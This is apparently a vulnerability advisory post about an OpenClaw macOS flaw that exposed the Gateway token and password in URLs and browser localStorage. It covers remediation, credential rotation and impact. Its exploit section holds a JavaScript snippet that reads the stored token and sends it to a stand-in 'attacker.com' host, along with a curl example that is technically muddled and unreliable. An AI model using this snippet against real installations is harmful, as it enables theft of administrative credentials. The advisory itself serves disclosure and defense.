Listen to this Post
The vulnerability resides in how the macOS Dashboard flow of OpenClaw handles Gateway authentication material. Before the fix, when a user opened the Control UI from the macOS app, the application constructed a URL to launch in the browser. Critically, it appended the shared Gateway token and its associated password directly to this URL’s query string. Once the browser loaded this URL, the Control UI’s JavaScript extracted the token from the URL parameters and, for the sake of persistence, stored it in the browser’s `localStorage` under the key openclaw.control.settings.v1. This created two significant exposure surfaces: first, the sensitive credentials were visible in the browser’s address bar and could be logged by referrer headers or browser history; second, the token was persisted in a script-accessible storage location on the disk, making it retrievable by any other malicious script running on the same origin or through a cross-site scripting attack.
dailycve form:
Platform: macOS
Version: <=2026.3.2
Vulnerability: Credentials in URL
Severity: Medium
date: 2026-03-09
Prediction: Patch already available
What Undercode Say:
Exploit:
An attacker with the ability to execute JavaScript on the same origin as the OpenClaw Control UI, or someone with access to the browser’s local storage (e.g., via a separate infostealer malware), could retrieve the Gateway token.
Example: Malicious script to steal token from localStorage
curl -X GET http://localhost:<control_ui_port>/?steal_token=true --data '{
"action": "getLocalStorage",
"key": "openclaw.control.settings.v1"
}'
// JavaScript code that could be injected to exfiltrate the token
(function stealToken() {
const settings = localStorage.getItem('openclaw.control.settings.v1');
if (settings) {
try {
const parsedSettings = JSON.parse(settings);
const gatewayToken = parsedSettings.gatewayToken; // Hypothetical path
// Send token to attacker's server
fetch('https://attacker.com/exfil', {
method: 'POST',
body: JSON.stringify({ token: gatewayToken }),
mode: 'no-cors'
});
} catch (e) {}
}
})();
Protection:
- Immediate Patch: Update the `openclaw` npm package to version `2026.3.7` or later.
npm update openclaw@latest
- Clear Stored Tokens: After patching, manually clear the browser’s local storage for the OpenClaw Control UI to remove any lingering exposed credentials. Open Developer Tools (F12), go to Application -> Local Storage, find the key
openclaw.control.settings.v1, and delete it. - Credential Rotation: Rotate the shared Gateway token and password immediately after patching, as they may have been previously exposed in logs or browser storage.
- Monitor Logs: Review macOS system logs and browser history for any instances of the full URL containing the token being inadvertently saved or transmitted.
Impact:
A successful exploit allows an attacker to obtain a valid, reusable Gateway admin token. With this token, they can bypass normal authentication and directly interact with the OpenClaw management interface. This can lead to full administrative control over the OpenClaw gateway, enabling the attacker to modify configurations, access sensitive data processed by the AI agent, and potentially execute arbitrary commands on the host system if gateway permissions allow . The exposure of the password in the query string compounds the risk, as it might be used for other services if credentials were reused.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

